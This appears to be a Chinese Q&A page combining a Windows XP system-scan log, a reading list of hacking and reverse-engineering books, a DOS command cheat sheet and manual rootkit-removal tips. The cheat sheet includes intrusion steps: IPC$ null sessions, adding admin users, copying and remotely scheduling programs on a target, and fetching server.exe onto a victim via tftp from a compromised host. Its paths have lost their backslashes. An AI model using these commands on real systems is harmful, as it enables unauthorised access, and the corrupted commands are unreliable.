<f:\KAV2007\KWatch.EXE><N/A>
[P4P Service / P4P Service][Running/Auto Start]
<C:\Program Files\Common Files\Sogou PXP\p2psvr.exe><Sohu.com Inc.>
[Windows XP / Windows XP ][Stopped/Auto Start]
<C:\WINDOWS\systemo.com.cn.ini><N/A>

==================================
驅動程序
[Service for WDM 3D Audio Driver / ALCXSENS][Running/Manual Start]
<system32\drivers\ALCXSENS.SYS><Sensaura Ltd>
[Service for Realtek AC97 Audio (WDM) / ALCXWDM][Running/Manual Start]
<system32\drivers\ALCXWDM.SYS><Realtek Semiconctor Corp.>
[AliIde / AliIde][Stopped/Boot Start]
<\SystemRoot\System32\DRIVERS\aliide.sys><N/A>
[ati2mtag / ati2mtag][Running/Manual Start]
<system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[CmdIde / CmdIde][Running/Boot Start]
<\SystemRoot\System32\DRIVERS\cmdide.sys><CMD Technology, Inc.>
[Intel(R) PRO Adapter Driver / E100B][Running/Manual Start]
<system32\DRIVERS\e100b325.sys><Intel Corporation>
[kl1 / kl1][Running/Boot Start]
<\SystemRoot\system32\drivers\kl1.sys><Kaspersky Lab>
[klif / klif][Running/System Start]
<\??\C:\WINDOWS\system32\drivers\klif.sys><Kaspersky Lab>
[KNetWch / KNetWch][Stopped/System Start]
<\??\f:\KAV2007\KNetWch.SYS><N/A>
[KWatch3 / KWatch3][Running/System Start]
<\??\C:\WINDOWS\system32\drivers\KWatch3.SYS><Kingsoft Corporation>
[MegaIDE / MegaIDE][Running/Boot Start]
<\SystemRoot\System32\DRIVERS\MegaIDE.sys><LSI Logic Corporation.>
[npkcrypt / npkcrypt][Running/Auto Start]
<\??\f:\Tencent\QQ\npkcrypt.sys><INCA Internet Co., Ltd.>
[nv / nv][Stopped/Manual Start]
<system32\DRIVERS\nv4_mini.sys><NVIDIA Corporation>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver / rtl8139][Stopped/Manual Start]
<system32\DRIVERS\RTL8139.SYS><Realtek Semiconctor Corporation>
[Secdrv / Secdrv][Running/Auto Start]
<system32\DRIVERS\secdrv.sys><Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.>
[Intel (R) System Management BIOS Service / SMBios][Running/Manual Start]
<system32\DRIVERS\SMBios.sys><Intel Corporation>
[smserial / smserial][Running/Manual Start]
<system32\DRIVERS\smserial.sys><Motorola Inc.>
[TSP / TSP][Stopped/Manual Start]
<\??\C:\WINDOWS\system32\drivers\klif.sys><Kaspersky Lab>
[ViaIde / ViaIde][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\viaide.sys><Microsoft Corporation>

==================================
瀏覽器載入項
[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[QQBrowserHelperObject Class]
{54EBD53A-9BC1-480B-966A-843A333CA162} <f:\Tencent\QQ\QQIEHelper.dll, 深圳市騰訊計算機系統有限公司>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C283} <f:\Thunder Network\Thunder\ComDlls\XunLeiBHO_002.dll, Thunder Networking Technologies,LTD>
[NavigatMon Class]
{B69F34DD-F0F9-42DC-9EDD-957187DA688D} <D:\360safe\safemon\safemon.dll, >
[浩方對戰平台]
{0A155D3C-68E2-4215-A47A-E800A446447A} <F:\HFGameOPT\GameClient.exe, 上海浩方在線信息技術有限公司>
[Web反病毒保護]
{1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} <F:\Kaspersky Lab\Kaspersky Anti-Virus 6.0\scieplugin.dll, Kaspersky Lab>
[信息檢索(&R)]
{92780B25-18CC-41C8-B9BE-3C9C571A8263} <D:\MICROS~1\OFFICE11\REFIEBAR.DLL, Microsoft Corporation>
[QQIEFloatBarCfgCmd Class]
{DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} <f:\Tencent\QQ\QQIEHelper.dll, 深圳市騰訊計算機系統有限公司>
[CEditCtrl Object]
{488A4255-3236-44B3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\AliEdit.dll, www.alipay.com>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[QQBrowserHelperObject Class]
{54EBD53A-9BC1-480B-966A-843A333CA162} <f:\Tencent\QQ\QQIEHelper.dll, 深圳市騰訊計算機系統有限公司>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C283} <f:\Thunder Network\Thunder\ComDlls\XunLeiBHO_002.dll, Thunder Networking Technologies,LTD>
[NavigatMon Class]
{B69F34DD-F0F9-42DC-9EDD-957187DA688D} <D:\360safe\safemon\safemon.dll, >
[&使用迅雷下載]
<f:\Thunder Network\Thunder\Program\GetUrl.htm, N/A>
[&使用迅雷下載全部鏈接]
<f:\Thunder Network\Thunder\Program\GetAllUrl.htm, N/A>
[導出到 Microsoft Office Excel(&X)]
<res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>

==================================
正在運行的進程
[PID: 600][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 664][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 688][\??\C:\WINDOWS\system32\winlogon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\klogon.dll] [Kaspersky Lab, 6.0.0.299]
[PID: 732][C:\WINDOWS\system32\services.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 744][C:\WINDOWS\system32\lsass.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 896][C:\WINDOWS\system32\Ati2evxx.exe] [N/A, N/A]
[PID: 908][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1000][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1116][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1204][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1312][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1544][C:\WINDOWS\system32\spoolsv.exe] [Microsoft Corporation, 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)]
[C:\WINDOWS\system32\EBPMON2.DLL] [SEIKO EPSON CORPORATION, 2, 20, 0, 0]
[PID: 1664][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.dll] [Adobe Systems, Inc., 7.0.0.0]
[f:\Thunder Network\Thunder\ComDlls\XunLeiBHO_002.dll] [Thunder Networking Technologies,LTD, 5, 0, 0, 2]
[C:\WINDOWS\system32\msdmo.dll] [N/A, N/A]
[C:\Program Files\WinRAR\rarext.dll] [N/A, N/A]
[F:\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll] [Kaspersky Lab, 6.0.0.299]
[f:\Unlocker\UnlockerHook.dll] [N/A, N/A]
[C:\WINDOWS\system32\icm32.dll] [Microsoft Corporation, 5.1.2600.2709 (xpsp_sp2_gdr.050628-1518)]
[f:\Unlocker\UnlockerCOM.dll] [N/A, N/A]
[C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.7.2006011200]
[PID: 1860][C:\WINDOWS\SOUNDMAN.EXE] [Realtek Semiconctor Corp., 5.1.0.22]
[PID: 1868][C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe] [ATI Technologies, Inc., 6.14.10.5120]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[C:\Program Files\ATI Technologies\ATI Control Panel\atipdsxx.dll] [ATI Technologies, Inc., 6.14.10.5120]
[C:\PROGRAM FILES\ATI TECHNOLOGIES\ATI CONTROL PANEL\ATRPUIXX.CHS] [ATI Technologies, Inc., 6.14.10.5120]
[C:\Program Files\ATI Technologies\ATI Control Panel\atipdxxx.dll] [ATI Technologies, Inc., 6.14.10.5120]
[PID: 1876][C:\WINDOWS\sm56hlpr.exe] [Motorola Inc., 6.09.07]
[C:\WINDOWS\sm56eng.dll] [N/A, N/A]
[C:\WINDOWS\sm56fra.dll] [N/A, N/A]
[C:\WINDOWS\sm56brz.dll] [N/A, N/A]
[C:\WINDOWS\sm56chs.dll] [N/A, N/A]
[C:\WINDOWS\sm56cht.dll] [N/A, N/A]
[C:\WINDOWS\sm56ger.dll] [N/A, N/A]
[C:\WINDOWS\sm56itl.dll] [N/A, N/A]
[C:\WINDOWS\sm56jpn.dll] [N/A, N/A]
[C:\WINDOWS\sm56spn.dll] [N/A, N/A]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[PID: 1884][C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE] [SEIKO EPSON CORPORATION, 3.03]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[PID: 1912][D:\360safe\safemon\360tray.exe] [奇虎網, 1, 0, 1, 1004]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[D:\360safe\safemon\SafeKrnl.dll] [奇虎網, 1, 0, 0, 3001]
[D:\360safe\AntiAdwa.dll] [360Safe.com, 2, 2, 5, 1000]
[D:\360safe\live.dll] [360safe.COM, 1, 0, 0, 1011]
[f:\Unlocker\UnlockerHook.dll] [N/A, N/A]
[PID: 1944][C:\Program Files\Common Files\Real\Update_OB\realsched.exe] [RealNetworks, Inc., 0.1.0.3760]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[PID: 2008][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[D:\360safe\safemon\safemon.dll] [, 1, 0, 0, 1004]
[PID: 212][C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe] [SEIKO EPSON CORPORATION, 2, 2, 0, 0]
[C:\WINDOWS\system32\EBAPI2.DLL] [SEIKO EPSON CORPORATION, 1, 4, 0, 0]
[C:\Program Files\Common Files\EPSON\EBAPI\EBPLPT.DLL] [SEIKO EPSON CORPORATION, 2, 20, 0, 0]
[PID: 168][C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE] [Microsoft Corporation, 7.00.9466]
[PID: 476][C:\Program Files\Common Files\Sogou PXP\p2psvr.exe] [Sohu.com Inc., 2, 0, 0, 28]
[C:\Program Files\Sogou PXP\vodsvr.dll] [Sohu.com Inc., 2, 3, 0, 1]
[C:\Program Files\Sogou PXP\pxpnet.dll] [Sohu.com Inc., 1, 0, 0, 9]
[C:\Program Files\Sogou PXP\p2pclient.dll] [Sohu.com Inc., 2, 9, 1, 4]
[PID: 1724][C:\WINDOWS\System32\alg.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]

==================================
文件關聯
.TXT OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM OK. ["C:\WINDOWS\hh.exe" %1]
.HLP OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1 localhost

==================================
API HOOK
警告！System Repair Engineer 提醒
你下面的函數內容與預期值不符，他
們可能被一些惡意的軟體所修改：
RVA 錯誤： LoadLibraryA
RVA 錯誤： LoadLibraryExA
RVA 錯誤： LoadLibraryExW
RVA 錯誤： LoadLibraryW
入口點錯誤：CreateProcessA
入口點錯誤：CreateProcessW

==================================

[/CODE]

9. 我想自學計算機請問我要要買那些最基礎的資料書啊

1.《黑客入門》
這是我看的第一本黑客書籍，是比較初級的一些黑客知識，但是後面的實例運用到了html代碼，主要是講
網頁方面入侵知識，當時我自己也看不懂那些，因此就去把html學一下（其實也就是看看代碼而已，自己
根本寫不出啥代碼來，呵呵……）
2.《30天打造專業紅客》
任何一本寫著什麼幾天精通，幾天速成的書，其實都是不可信的，但這不是我們現在要講的問題，這本書
可以彌補上本書中的本足之處，裡面有一些內容可能講得會比較詳細些，適合初學者。
3.《防黑檔案》
這本書是東方飄雲寫的，好像就是綠色兵團的副司令吧，呵呵，我先頂一下…………
4.《黑客攻防實戰入門》
這是一本以實戰為主線的黑客書籍，大力推薦！！！必竟電腦技術本來就是要在實踐中才能提高的，光靠
理論是行不通，你可以邊看此書邊操作，相信對於你的實戰能力會有所幫助的。
上面這些都是一些黑客入門方面的書籍，其中有部分是相同，大家可擇其善者而從之！！！
5.《C語言程序設計》
不學編程的人是永遠不可能成為黑客的，因此學編程也成為我們在學黑道路上的必經之路，也是最需要精
力與耐力的過程。這本就是譚浩強寫的那本，大家也可以看看老外寫的那本《the c programe language》,
如果你能將書中的代碼都自己調試操作一遍，對於C語言基礎知識的掌握應該不成問題。
6.《VC++深入詳解》
這是一本他人根據孫鑫的視頻教程編寫的一本書，因此這本書也就有其配套視頻了，地址如下：
http://tech.163.com/special/0009159F/vc.html
7.《IBM-PC匯編語言程序設計》
這是清華大學出版的，雖然有點過時了，是本16位機器時代的，與現在的win32,win64有點差別，但其本
質也是大同小異的，相信對於想學習逆向分析的戰友們，匯編也是一項必修課啊，關於此書，各位可以看
看中山大學的匯編語言視頻教程，其教學方式也是比較新穎的，大家一看便知，地址如下：
http://bbs.topsage.com/dispbbs_121_164375_1.html
如果想要看在線視頻，可通過下面地址查看：http://202.116.65.193/Ncourse/hbyy/hb01/，
將後面的hb01改為02，03……即可，不過很慢，緩沖都要N久，我是等得不耐煩了，呵呵
8.《windows環境下的32位匯編語言程序設計》
就是羅雲彬寫的那本，如果你學完了上本匯編書籍或視頻，那麼就可以開始學習win32匯編了，要知道這本
書我是用手機看的，呵呵，不容易啊，因為缺乏實踐，因此自己學得也不咋滴，自己是打算先簡單看一遍
，簡單了解個大概，再看第二遍，這遍以實踐操作為主，最後再系統地復習一遍，這項任務，本人尚未完
成啊，以上意見也只是給大家做個參考而已，希望對大家有所幫助。
9.《ASP從入門到精通》
想學腳本入侵的戰友，腳本語言是一定要學的，有機會也最好自己做個博客之類的站點。這本書後面有很
多的實例項目，如後台管理，收費系統等等。另外還有一本我自己看過的關於asp的書——《ASP可視化編
程與應用》，此書是在dreamweaver下面的實踐操作，也算是在學asp的同時，也學習一下dreamweaver的
使用，一舉兩得。這兩本書中對html以及vbscript均有所講解，因為asp中可嵌入vbscript,javascript.
10.《php高手寶典》
此書我是沒看過，只是看了下目錄與開頭而已，打算後面有時間再補看一下，因此對此書我也沒有什麼發
言權了，有看過的戰友可以發表一下意見。
11.《黑客反匯編揭秘》
這是一本關於逆向分析的書，與其配套的還有一本叫《黑客調試技術揭秘》，反匯編這本書網上有電子書
，大家可下載來看，pdf格式的，但是調試這本書我沒找到，在網上寫著調試的書名，下載下來才發現是反
匯編那本書.這兩本書對匯編知識均有一定的要求，因此建議大家先學完匯編再看。
12.《網路黑客加密與解密》
這本書裡面有一些腳本入侵方面的一點知識，內容較少，主要是講加解密方面的知識，後面有大部分的破
解實例講解，但注釋較少，我自己當時也是看得迷糊迷糊的（沒辦法，自己匯編能力差點，呵呵）
13.《加密解密全方位學習》
這本書我是在圖書館看到的，適合加解密初學者，因為這本書要求的預備知識不高，只要有點C語言基礎就
可以，裡面會講到一些相對簡單些的匯編指令，以及crackme的簡單製作，還有注冊機的編寫(個人覺得不
是很詳細)
14.《加密與解密》
就是看雪學院那本書，第三版快出來了，就在這一二月份吧！我 看的是第二版的電子書，還沒看完，這本
書在加解密方面寫得算是比較完整詳細的了，而且是從基礎講起，循序漸進，大力推薦，若要學習逆向工
程，看雪學院也確實是個不錯的地方。
15.《shellcode編程揭秘》
這是一本關於緩沖區溢出攻擊的書，我自己也沒看過，不過電子書倒是有，就放在郵箱裡面，呵呵，打算
後面再看，關於溢出攻擊的書還有很多，如《網路滲透技術》，《緩沖區溢出攻擊檢測，預防，剖析》，
《the shellcode handbook》
16.《深入理解計算機系統》
此書也是我在圖書館借的，被我霸佔了半年之久，這次又被我借回來復習一下了（真對不起各位書友啊，
呼呼……），這是一本站在程序員的角度寫的一本書，因此也必須要有C語言基礎，要是有unix系統的操作
經驗會更好，因為這本書中的代碼就是在UNIX下調試操作的。相信這本書對於你學出更好的代碼會有一定
的幫助，其中還有特別的一章用來講解如何編寫高效的程序，並以一個實例代碼來講解，一步步地進行完
善，最終寫出一個高效率的程序。這本書也是學溢出攻擊方面的基礎知識，在安全焦點上也說這本書是《
網路滲透技術》的基礎知識，但看完這本書也不一定能看懂網滲，呵呵……
17.《rootkit:windows內核安全防護》
內容簡介
本書是目前第一本關於rootkit的詳盡指南，包括rootkit的概念、它們是怎樣工作的、如何構建和檢測它們
。世界頂級軟體安全專家、rootkit.com創始人Greg Hoglund和James Butler向大家詳細介紹攻擊者是如何
進入系統並長期駐留而不會被檢測到的，以及黑客是如何摧毀Windows XP和Windows 2000內核系統的，
其概念可以應用於現代任何主流操作系統。通過本書，讀者可以全面掌握rootkit，提升自己的計算機安全
防範能力.
18.《0day安全：軟體漏洞分析技術》
四月份剛出版的，看雪論壇的，有看過一部分學得還不錯，適合對溢出感興趣的戰友們。要告訴你點常識…雖然多，但都是基本的！希望你可以用心去學！

DOS 命令
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把"用戶"添加到管理員中使其具有管理員許可權,注意：
administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與"目標IP"主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數："-w數字"用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數："-l[空格]數據包大小"；"-n發送數據次數"；"-t"指一直
ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參
數"/all"顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-
H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如"DEL/AR *.*"表示刪除當前目錄下所有隻讀文件，"DEL/A-
S *.*"表示刪除當前目錄下除系統文件以外的所有文件
二：
del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統
確認就直接刪除。（二個命令作用相同）
move 盤符路徑要移動的文件名 存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命
令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：
2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文
件）至本地C：
x 要復制的文件或目錄樹 目標地址目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將"IP"的
server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式
（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:server.exe 登陸後，上傳本地c:server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文
本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway
addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令 望採納O(∩_∩)O

10. RootKit.Torn.aw

如果用瑞星殺不掉的話，用諾頓試試
實在不行的話,手動殺毒方法：
首先進入安全模式，關閉所有服務重起後，找到病毒主程序，在注冊表查看中輸入主程序文件名「比如1.exe」選上全匹配點確定，找到後刪除，然後在刪除病毒主程序「1.exe」
然後我的電腦——搜索——所有文件和文件夾裡面輸入「*.exe」後點搜索，就出現所有EXE文件，把自己認為所有有可能被感染的文件一個一個用記事本打開，具體方法是右鍵——打開方式——選記事本，就會出現該文件的代碼，如果文件代碼裡面有「=病毒的代碼"具體代碼我在這里就不說了，可以在網上找到，沒問題的文件當然就不用去管了，如果有這類代碼的文件，那麼是不重要的就刪除，重要的就把代碼刪除後點保存就可以了，至於DLL文件都是和EXE文件有關聯的，只要EXE文件被刪除那麼DLL文件只是死病毒沒有任何作用，如果不放心的話也可以用同樣的方法刪除DLL文件搜索方法也是「*.DLL」。
好了以後把需要的服務打開後就可以了。補充下記得把網路斷開後在實行操作。在完成後用殺毒軟體殺一下，因為一般中大型病毒後會把一些比較老的小病毒帶入所以殺下小病毒的話幾乎任何殺毒軟體都可以殺掉。